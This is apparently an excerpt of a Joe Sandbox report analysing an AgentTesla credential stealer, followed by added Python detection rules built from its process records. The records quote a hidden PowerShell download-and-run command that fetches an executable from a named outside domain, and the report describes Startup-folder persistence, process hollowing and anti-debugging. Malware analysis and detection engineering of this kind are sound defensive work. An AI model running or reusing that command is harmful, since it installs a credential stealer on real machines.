                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:04:39:26
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                                      Imagebase:0xea0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:04:39:37
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
                                                                      Imagebase:0x7ff6d0a00000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:04:39:37
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'305'263 bytes
                                                                      MD5 hash:AA6F514A7AFA81E26BCF612923EA483C
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:04:39:43
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                                                                      Imagebase:0x680000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:04:39:50
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                                                                      Imagebase:0x500000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:04:39:50
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:04:39:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                                                                      Imagebase:0x590000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:04:39:58
                                                                      Start date:27/09/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true
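The process list above carries four observations a detection engineer would turn into rules: Target ID 0 is a hidden PowerShell window that fetches grace.exe with Invoke-WebRequest, writes it to the user's Temp folder and starts it; Target IDs 7, 8 and 12 run with a command line naming a different executable than the on-disk image (recomplaint.exe and RegSvcs.exe carrying the dropper's command line, the shape behind the "Maps a DLL or memory area into another process" signature); Target ID 10 is WScript running recomplaint.vbs out of the per-user Startup folder; and Target IDs 13 and 15 run aWUFv.exe from AppData\Roaming with the same MD5 as the system RegSvcs.exe (9D352BC46709F0CB5EC974633A0C3C94), that is, a byte-identical copy of a Windows binary relocated to a user-writable path. The Python below is an added example, not part of the Joe Sandbox report: it encodes those four rules and runs them over records constructed from the Target ID blocks above (only the path, command line and MD5 fields are kept; Target ID 15 is omitted as a duplicate of 13). The record layout, the rule names and the regular expressions are this example's own.

```python
"""Detection rules over the process list above, run against records constructed from it.
Added example, not part of the Joe Sandbox report; field and rule names are ours."""
import ntpath
import re

# Constructed from the Target ID blocks above (only the fields the rules need).
PROCESSES = [
    {"id": 0, "md5": "04029E121A0CFA5991749937DD22A1D9",
     "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"'''},
    {"id": 2, "md5": "0D698AF330FD17BEE3BF90011D49251D", "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"id": 3, "md5": "AA6F514A7AFA81E26BCF612923EA483C", "path": r"C:\Users\user\AppData\Local\Temp\file.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\file.exe"'},
    {"id": 7, "md5": "AA6F514A7AFA81E26BCF612923EA483C", "path": r"C:\Users\user\AppData\Local\unspattered\recomplaint.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\file.exe"'},
    {"id": 8, "md5": "9D352BC46709F0CB5EC974633A0C3C94", "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\file.exe"'},
    {"id": 10, "md5": "A47CBE969EA935BDD3AB568BB126BC80", "path": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"'},
    {"id": 11, "md5": "AA6F514A7AFA81E26BCF612923EA483C", "path": r"C:\Users\user\AppData\Local\unspattered\recomplaint.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"'},
    {"id": 12, "md5": "9D352BC46709F0CB5EC974633A0C3C94", "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"'},
    {"id": 13, "md5": "9D352BC46709F0CB5EC974633A0C3C94", "path": r"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"'},
]

def image_from_cmdline(cmdline):
    """First argv element: the quoted path, or the text up to the first space."""
    cl = cmdline.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[1:end] if end > 0 else cl[1:]
    return cl.split(" ", 1)[0]

def rule_image_mismatch(p):
    """On-disk image differs from the image its own command line names: the shape of a
    hollowed or replaced process (Target IDs 7, 8 and 12 above). Case-insensitive so that
    conhost.exe's 'system32' spelling does not fire."""
    return image_from_cmdline(p["cmdline"]).lower() != p["path"].lower()

DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
DROP_TO_USER_PATH = re.compile(r"-outfile\s+\S*\\(temp|appdata)\\", re.I)
EXECUTE = re.compile(r"start-process|invoke-expression|\biex\b|invoke-item", re.I)

def rule_download_cradle(p):
    """PowerShell fetching a payload and writing it under Temp/AppData or running it."""
    if ntpath.basename(p["path"]).lower() not in {"powershell.exe", "pwsh.exe"}:
        return False
    cl = p["cmdline"]
    return bool(DOWNLOAD.search(cl) and (DROP_TO_USER_PATH.search(cl) or EXECUTE.search(cl)))

STARTUP_SCRIPT = re.compile(r'\\start menu\\programs\\startup\\[^"]*\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd)\b', re.I)

def rule_startup_script(p):
    """Script host running a script out of the per-user Startup folder."""
    return (ntpath.basename(p["path"]).lower() in {"wscript.exe", "cscript.exe"}
            and bool(STARTUP_SCRIPT.search(p["cmdline"])))

def rule_system_binary_copy(p, windows_hashes):
    """A user-writable path serving a byte-identical copy of a binary also seen under the Windows directory."""
    return not p["path"].lower().startswith("c:\\windows\\") and p["md5"].upper() in windows_hashes

def run_rules(procs):
    """Return (rule, target id) pairs for every rule that fires."""
    windows_hashes = {p["md5"].upper() for p in procs if p["path"].lower().startswith("c:\\windows\\")}
    hits = []
    for p in procs:
        if rule_image_mismatch(p):
            hits.append(("image_mismatch", p["id"]))
        if rule_download_cradle(p):
            hits.append(("download_cradle", p["id"]))
        if rule_startup_script(p):
            hits.append(("startup_script", p["id"]))
        if rule_system_binary_copy(p, windows_hashes):
            hits.append(("system_binary_copy", p["id"]))
    return hits

if __name__ == "__main__":
    for rule, tid in run_rules(PROCESSES):
        print("Target ID %d: %s" % (tid, rule))
```

Against these records the rules fire on Target IDs 0, 7, 8, 10, 12 and 13 and stay silent on 2, 3 and 11. The hash-based rule is the one worth noting in production: comparing the MD5 of every process image under a user profile against the hashes of images seen under C:\Windows catches renamed copies of .NET utilities such as RegSvcs.exe regardless of the name they were given, and needs no prior knowledge of the sample.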

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2300598863.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd34770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f33d1e632989635678b245328cc7bc1721c8c077b4203030e450c6231414e73
                                                                        • Instruction ID: b660c7a411bc3914f106ca2a174f464b8a8971992e48fa8ce72d43bb11ef9079
                                                                        • Opcode Fuzzy Hash: 6f33d1e632989635678b245328cc7bc1721c8c077b4203030e450c6231414e73
                                                                        • Instruction Fuzzy Hash: 2311C47150D7C54FE746DB28A8A55A4BFB0EF53230B1401DFD1C5CB1A3D12AA88AC742
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2300598863.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd34770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction ID: 281100a30d7c8aacf98cc0b2a1d9629b209f2f8b3be5d8b47f005ab220b1047f
                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                        • Instruction Fuzzy Hash: E101677121CB0C8FD744EF0CE491AB9B7E0FB95364F50056DE58AC3651D636E881CB45

                                                                        Execution Graph

                                                                        Execution Coverage:13.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:12.9%
                                                                        Total number of Nodes:31
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph: [rendered graph omitted; only the recoverable node information is kept] Root nodes at 0x1670848 and 0x1678b48. API calls on the graph: CheckRemoteDebuggerPresent (0x16780a8 / 0x167804f), GlobalMemoryStatusEx ×2 (0x6e5fc20), DeleteFileW (0x1678b8e).
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6ac5f72f46b05cf1dfb870b3e766505e58c39a6f8e6563686ad28d9e56c9719
                                                                        • Instruction ID: 7cedeba80cf63c7c4230623099e0889257321527014ce26b0cd3a7e602527095
                                                                        • Opcode Fuzzy Hash: d6ac5f72f46b05cf1dfb870b3e766505e58c39a6f8e6563686ad28d9e56c9719
                                                                        • Instruction Fuzzy Hash: DC630C31D10B1A8ADB11EF68C8905A9F7B1FF99300F15D79AE45877221FB70AAC5CB81

                                                                        Control-flow Graph

                                                                        [Control-flow graph rendered as an image; edge list omitted, executed/not-executed colouring not recoverable from text] Function at 0x6e55150; basic blocks span 0x6e55150 to 0x6e5586f; calls 0x6e55877 and 0x6e55b80 from block 0x6e557b5.
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 88cdc8a85157f21eac9392a46fc6a5953ebdc8b22d1a839614fa98c1517ad7ba
                                                                        • Instruction ID: cffa37539bd36f0a568feb367aa2099bbf2f913195a2c7f226f57d126b7d06f9
                                                                        • Opcode Fuzzy Hash: 88cdc8a85157f21eac9392a46fc6a5953ebdc8b22d1a839614fa98c1517ad7ba
                                                                        • Instruction Fuzzy Hash: 5222B035E003158FDF64DBA8C5846AEBBB2FF89314F258469D806EB354DA35EC46CB90

                                                                        Control-flow Graph

                                                                        [Control-flow graph rendered as an image; edge list omitted, executed/not-executed colouring not recoverable from text] Function at 0x16780a8; calls CheckRemoteDebuggerPresent at 0x167804f and 0x1677964 / 0x1677974 from block 0x16780d4.
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: e23c2f61c7fd8ad678381aca5f1cd0c7ae00323ede40b41f6efd8cdaa0ec514e
                                                                        • Instruction ID: b39c6b7746ef7b20f74d4b5312f50609bc1ffcb6af4526fb1db2ff451f4078f6
                                                                        • Opcode Fuzzy Hash: e23c2f61c7fd8ad678381aca5f1cd0c7ae00323ede40b41f6efd8cdaa0ec514e
                                                                        • Instruction Fuzzy Hash: 5D21F632A002559FDF01DFB99C483FEBBE5EF45220F1484A9D685D7242E7388A46CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29a640267d11ca9f0c650c2450ff35c7939d4da5756f1d85050b0d3333456a60
                                                                        • Instruction ID: 329ac67169d6a29d78304f63af0d92c93c7188bac88f60591156d45b2c8c9fb9
                                                                        • Opcode Fuzzy Hash: 29a640267d11ca9f0c650c2450ff35c7939d4da5756f1d85050b0d3333456a60
                                                                        • Instruction Fuzzy Hash: 35629C34B002058FEB54DB68D584AADB7F2EF88318F559569E806DB3A1DB35EC46CB80

                                                                        Control-flow Graph

                                                                        [Control-flow graph rendered as an image; edge list omitted, executed/not-executed colouring not recoverable from text] Function at 0x6e5c130; basic blocks span 0x6e5c130 to 0x6e5c9ae; calls 0x6e56138 from blocks 0x6e5c615 and 0x6e5c84c.
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6d738129aa19cd7d7e959a1b986b191025a69bb05764729c4c5cc1eebd6ab00
                                                                        • Instruction ID: 0337ad684c0647063064549b2c65c508fdbab3c234233068ab712ea8773c1ea2
                                                                        • Opcode Fuzzy Hash: c6d738129aa19cd7d7e959a1b986b191025a69bb05764729c4c5cc1eebd6ab00
                                                                        • Instruction Fuzzy Hash: 1D329F74B103098FDB50DB68D894BADB7B6EF88714F219529DA05EB381DB34EC468F90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d074fdabe5cb80a67c966375a14c9c315db42b3c6e0427983f1272ff3db4b0c3
                                                                        • Instruction ID: 452fe1c72634750d17f588387735cb7c9a5efd420f48a2c30f3c49bc722a6fa3
                                                                        • Opcode Fuzzy Hash: d074fdabe5cb80a67c966375a14c9c315db42b3c6e0427983f1272ff3db4b0c3
                                                                        • Instruction Fuzzy Hash: 5A227334E103098FEF64DB68C4A47AEB7B6FB49314F219526E845EB391DA34DC81CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a270aaf4547c66c1a0cee23e040a39252aace79f494c192fcb606bbc30d2b63
                                                                        • Instruction ID: 9ffdd89e5f272e54a246db5e1640974cec6ebdcac4f509d70dc207824658fea4
                                                                        • Opcode Fuzzy Hash: 1a270aaf4547c66c1a0cee23e040a39252aace79f494c192fcb606bbc30d2b63
                                                                        • Instruction Fuzzy Hash: 98322E31E1075ACFDB14DF74C85499DB7B6FF89300F2196AAD809A7265EB30AD85CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6df537dcf0a673501989b2f2ed17ab458fd5024f40646c44cc5a78d2d2c69620
                                                                        • Instruction ID: 2c8dd4bedcc8c1b4a2fbb01638b901f58a1bf32e360e1d3e52bff10f00b930ef
                                                                        • Opcode Fuzzy Hash: 6df537dcf0a673501989b2f2ed17ab458fd5024f40646c44cc5a78d2d2c69620
                                                                        • Instruction Fuzzy Hash: 58029F30B003068FEF54DF68D894AAEB7A2FF84314F259569D9069B354EB35EC52CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b489fac14abe0ce369de41d99c89011d6f1ac0ab3732238b135315036d61e5a
                                                                        • Instruction ID: 59a97e1c032cba1a1d0cc125abc3ce8905f419e2bc99389cfd5ee43d2f41357d
                                                                        • Opcode Fuzzy Hash: 2b489fac14abe0ce369de41d99c89011d6f1ac0ab3732238b135315036d61e5a
                                                                        • Instruction Fuzzy Hash: F2E11731B102148FDF54DB68D494AAEBBF2FF89324F26846AD846DB365CA31DC05CB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e6b243234c9e782cfab638b04ee607a79899b6d5572d1cd10b5f3cc83c558f3
                                                                        • Instruction ID: 9addc1bccd4432cfd6f920f016f9b073414ce0556861c2742f1fbe5c8f38bf01
                                                                        • Opcode Fuzzy Hash: 5e6b243234c9e782cfab638b04ee607a79899b6d5572d1cd10b5f3cc83c558f3
                                                                        • Instruction Fuzzy Hash: EBB1C674B002598BEB58AF79985467E7BE7BFC8700B1584ADE447D7388CE34DC028B96
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 240b8a9580fdd41cceb499e285c616ccb5a9e3f8760377016ee32e062671bf82
                                                                        • Instruction ID: 97be561380430758aca39c7ca0336f9539e2ffaf63cea0411efe56132ec80646
                                                                        • Opcode Fuzzy Hash: 240b8a9580fdd41cceb499e285c616ccb5a9e3f8760377016ee32e062671bf82
                                                                        • Instruction Fuzzy Hash: 26B13D71E00209CFDB14CFA9DC897ADBBF2AF88714F148529D815AB354EB749845CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cd09b2dab4f350b9efa4bf008eb93789a5aa6b1ca057b1a2b9caf7cc680a272
                                                                        • Instruction ID: 3538c94b65e6af91daff49a32569721689c2ac6a8f8a8dc486a22a95caf66597
                                                                        • Opcode Fuzzy Hash: 7cd09b2dab4f350b9efa4bf008eb93789a5aa6b1ca057b1a2b9caf7cc680a272
                                                                        • Instruction Fuzzy Hash: 86914C70E00209DFDF15DFA9DC897ADBBF2AF88714F148129E815AB354EB349885CB91

                                                                        Control-flow Graph

                                                                        [Control-flow graph rendered as an image; edge list omitted, executed/not-executed colouring not recoverable from text] Function at 0x167f79b; calls GlobalMemoryStatusEx in block 0x167f7bf-0x167f84c.
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0167F83F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: 7cff1e69e3f66361a021abf5253a35f18f1e22c89fefbc3fd0e4ea9db659c41a
                                                                        • Instruction ID: 6ad90e6331779857fd17ed60d2e562cd881731c9352182e00720e7d72ca11c8e
                                                                        • Opcode Fuzzy Hash: 7cff1e69e3f66361a021abf5253a35f18f1e22c89fefbc3fd0e4ea9db659c41a
                                                                        • Instruction Fuzzy Hash: AF219AB1C0025ACFDB10CFA9C8447EEBBF4AF08310F15856AD914A7340D3389841CFA0

Control-flow Graph (rendered graph omitted): entry block 1677fd0-167805c, which calls CheckRemoteDebuggerPresent; exit block 1678065-16780a0
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 19fff29062ebbab62677397c6544efa8b171fcdca783332a2f5345f64604447f
                                                                        • Instruction ID: ff2c94d66017ce6312490b0a75eadafa4389bec09bcedd84a3b3cdbde5035fe8
                                                                        • Opcode Fuzzy Hash: 19fff29062ebbab62677397c6544efa8b171fcdca783332a2f5345f64604447f
                                                                        • Instruction Fuzzy Hash: B6214AB280125ACFDB10CF99C884BEEFBF4AF49310F14845AE455A7251D3789944CF61

Control-flow Graph (rendered graph omitted): entry block 1677fd8-167805c, which calls CheckRemoteDebuggerPresent; exit block 1678065-16780a0
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0167804F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 5ef63de9b506027b27e060c7f643da427e8c8f34d51ac12da453d7e0a42c1c65
                                                                        • Instruction ID: adeb8156f8b0886048d3ac7e84051d1e750948976c97440619403e58e3115eb7
                                                                        • Opcode Fuzzy Hash: 5ef63de9b506027b27e060c7f643da427e8c8f34d51ac12da453d7e0a42c1c65
                                                                        • Instruction Fuzzy Hash: 122157B2800259CFDB10CF9AC884BEEFBF4AF48320F14842AE458A7351D738A944CF60

Control-flow Graph (rendered graph omitted): entry block 1678b42-1678b92; DeleteFileW called in block 1678b9a-1678bc5; exit block 1678bce-1678bf6
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 01678BB8
